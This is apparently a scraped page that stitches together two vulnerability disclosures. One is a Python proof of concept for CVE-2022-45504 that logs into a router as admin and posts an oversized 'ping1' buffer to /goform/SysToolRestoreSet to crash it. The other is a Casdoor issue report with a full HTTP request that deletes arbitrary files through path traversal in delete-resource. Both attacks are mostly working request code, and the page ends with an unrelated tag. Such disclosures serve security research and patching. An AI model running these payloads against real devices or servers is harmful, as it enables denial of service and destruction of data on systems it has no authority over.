'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolRestoreSet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45504: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.

Hi,

I was looking at the fix to #1035:  

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.  
Thus, it's possible to delete any file outside application's webroot:  

POC request:

    POST /api/delete-resource?provider= HTTP/1.1
    Host: localhost:8008
    Content-Length: 363
    sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Content-Type: text/plain;charset=UTF-8
    Accept: */*
    Origin: http://localhost:8008
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:8008/resources
    Accept-Encoding: gzip, deflate
    Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
    Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
    Connection: close
    
    {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}

Tag

#webkit